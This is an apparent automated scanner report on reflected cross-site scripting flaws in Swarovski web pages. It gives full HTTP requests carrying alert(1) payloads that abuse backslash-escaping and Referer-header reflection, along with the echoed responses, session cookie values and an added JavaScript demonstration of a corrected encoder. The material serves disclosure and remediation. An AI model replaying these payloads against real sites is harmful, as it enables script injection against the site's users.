Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-LoginRegister', query: '4e72d\\';alert(1)//6d5a55c111=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.41. https://www.swarovski.com/Web_US/en/ogcbuy [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.swarovski.com
Path: /Web_US/en/ogcbuy
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec68d\'%3balert(1)//b09073b3015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec68d\\';alert(1)//b09073b3015 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/ogcbuy?ec68d\'%3balert(1)//b09073b3015=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_OGCPage-ViewPage', query: 'ec68d\\';alert(1)//b09073b3015=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.42. https://www.swarovski.com/Web_US/en/orderhistory [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/orderhistory
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d51a\'%3balert(1)//a4a452171b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8d51a\\';alert(1)//a4a452171b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks are escaped.
Request
GET /Web_US/en/orderhistory?8d51a\'%3balert(1)//a4a452171b9=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... y/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewOrderHistory', query: '8d51a\\';alert(1)//a4a452171b9=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.43. https://www.swarovski.com/Web_US/en/profile [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/profile
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60fce\'%3balert(1)//fa4a4a3b8b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60fce\\';alert(1)//fa4a4a3b8b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks are escaped.
Request
GET /Web_US/en/profile?60fce\'%3balert(1)//fa4a4a3b8b4=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... finity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewProfile', query: '60fce\\';alert(1)//fa4a4a3b8b4=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.44. https://www.swarovski.com/Web_US/en/wishlist [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.swarovski.com
Path:
/Web_US/en/wishlist
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fde2\'%3balert(1)//b484e3ed9ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fde2\\';alert(1)//b484e3ed9ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks are escaped.
Request
GET /Web_US/en/wishlist?2fde2\'%3balert(1)//b484e3ed9ca=1 HTTP/1.1
Host: www.swarovski.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... inity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewWishlist', query: '2fde2\\';alert(1)//b484e3ed9ca=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f05ef'-alert(1)-'0b9e393a43c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed, using client-side technologies such as Flash, of causing another user's browser to make a request containing an arbitrary HTTP header. If such a technique is available, it can probably be leveraged to exploit this XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Content.Node/ HTTP/1.1
Host: www.swarovski-elements.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f05ef'-alert(1)-'0b9e393a43c
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html
Expires: Sun, 12 Dec 2010 21:53:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 12 Dec 2010 21:53:48 GMT
Content-Length: 17456
Connection: close
Set-Cookie: is=c11a38964a70a4ad667b25aa613230bf; expires=Mon, 12-Dec-2011 21:53:43 GMT
Set-Cookie: sid=aba311b67de926956fae4d7ad16f2308
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>SWAROVSK ...[SNIP]... <!-- var clientCountry = 'US'; var googleTracker = false; var referer = 'http://www.google.com/search?hl=en&q=f05ef'-alert(1)-'0b9e393a43c';
function sendTracking(deeplink, language, version) { //PixelTracking var path = escape(deeplink).replace(/\//g, '%2F'); var ref = escape(referer).replace(/\//g, '%2F'); ...[SNIP]...
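The following is an added JavaScript example and is not code from the XSS.CX report or from the scanned sites. It reproduces both reflection patterns described in this section: the backslash-escaping bypass in findings 1.41 to 1.44 (the application escapes the quote but not the backslash) and the completely unescaped single-quoted reflection in the Referer finding. The payloads are the ones quoted in the report; `buildSnippet`, `analyse`, `findStringEnd` and the fixed `=1&SetIncludeCookies=true` tail are assumptions made for illustration, standing in for the `linkparams: {query: '...'}` fragment in the responses. `escapeForJsSingleQuoted` is the encoder the remediation text calls for, escaping the backslash before the quote.

```javascript
// Added example, not from the XSS.CX report or the scanned sites.
// Assumed helpers: buildSnippet, analyse, findStringEnd and the fixed tail
// below exist only for illustration.

// Flawed defence seen in findings 1.41-1.44: quotes get a backslash,
// backslashes already present in the input are left alone.
function escapeQuotesOnly(input) {
  return input.replace(/'/g, "\\'");
}

// No encoding at all, as in the Referer finding ("echoed unmodified").
function identity(input) {
  return input;
}

// Correct encoder for a single-quoted JavaScript string literal. The
// backslash is escaped FIRST: doing it after the quote would double the
// backslash we just added and re-open the string. Angle brackets and line
// terminators are encoded too, because "</script>" ends the script block
// before the JS tokenizer ever sees the quotes.
function escapeForJsSingleQuoted(input) {
  return input
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/"/g, '\\"')
    .replace(/</g, "\\x3c")
    .replace(/>/g, "\\x3e")
    .replace(/\r/g, "\\r")
    .replace(/\n/g, "\\n")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Emit the fragment the way the vulnerable template does: the (already
// encoded) value goes between single quotes, followed by a fixed tail.
function buildSnippet(encoded) {
  return "query: '" + encoded + "=1&SetIncludeCookies=true'";
}

// Find where a single-quoted JS string literal really ends, honouring
// backslash escapes the way the JS tokenizer does. Returns the index of the
// closing quote, or -1 if the literal never terminates.
function findStringEnd(src, openIndex) {
  for (let i = openIndex + 1; i < src.length; i++) {
    if (src[i] === "\\") { i++; continue; } // escaped character: skip it
    if (src[i] === "'") return i;
  }
  return -1;
}

// Run a payload through an encoder and report whether the result still sits
// inside one string literal. Any text after the real closing quote is code
// the attacker got out of the string.
function analyse(encoder, payload) {
  const snippet = buildSnippet(encoder(payload));
  const open = snippet.indexOf("'");
  const close = findStringEnd(snippet, open);
  const injected = close === -1 ? "" : snippet.slice(close + 1);
  return {
    snippet,
    unterminated: close === -1,
    brokeOut: injected.length > 0,
    injected,
    // a separate break-out route the quote analysis cannot see
    closesScript: /<\/script/i.test(snippet),
  };
}

// Payloads quoted in the report, written here as JS string constants.
const PARAM_PAYLOAD = "ec68d\\';alert(1)//b09073b3015";   // finding 1.41
const REFERER_PAYLOAD = "f05ef'-alert(1)-'0b9e393a43c";   // Referer finding
const SCRIPT_CLOSE_PAYLOAD = "</script><script>alert(1)</script>"; // constructed

function demo() {
  const encoders = [
    ["quotes-only", escapeQuotesOnly],
    ["none", identity],
    ["fixed", escapeForJsSingleQuoted],
  ];
  for (const [name, enc] of encoders) {
    for (const p of [PARAM_PAYLOAD, REFERER_PAYLOAD, SCRIPT_CLOSE_PAYLOAD]) {
      const r = analyse(enc, p);
      const verdict = r.brokeOut || r.closesScript ? "BREAKOUT" : "safe";
      console.log(name.padEnd(11), verdict.padEnd(8), r.snippet);
    }
  }
}

demo();
```

Running it shows `quotes-only` turning the report's payload into `'ec68d\\';alert(1)//...` exactly as echoed in the responses above, with `;alert(1)//...` landing outside the literal, while the fixed encoder yields `'ec68d\\\';alert(1)//...'` and the literal closes where the template intended. The `</script>` case is the caveat: quote-only escaping leaves it well-formed as JavaScript, yet the HTML parser still terminates the script block, which is why the encoder also hex-encodes angle brackets.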
Report generated by XSS.CX at Sun Dec 12 16:31:35 CST 2010.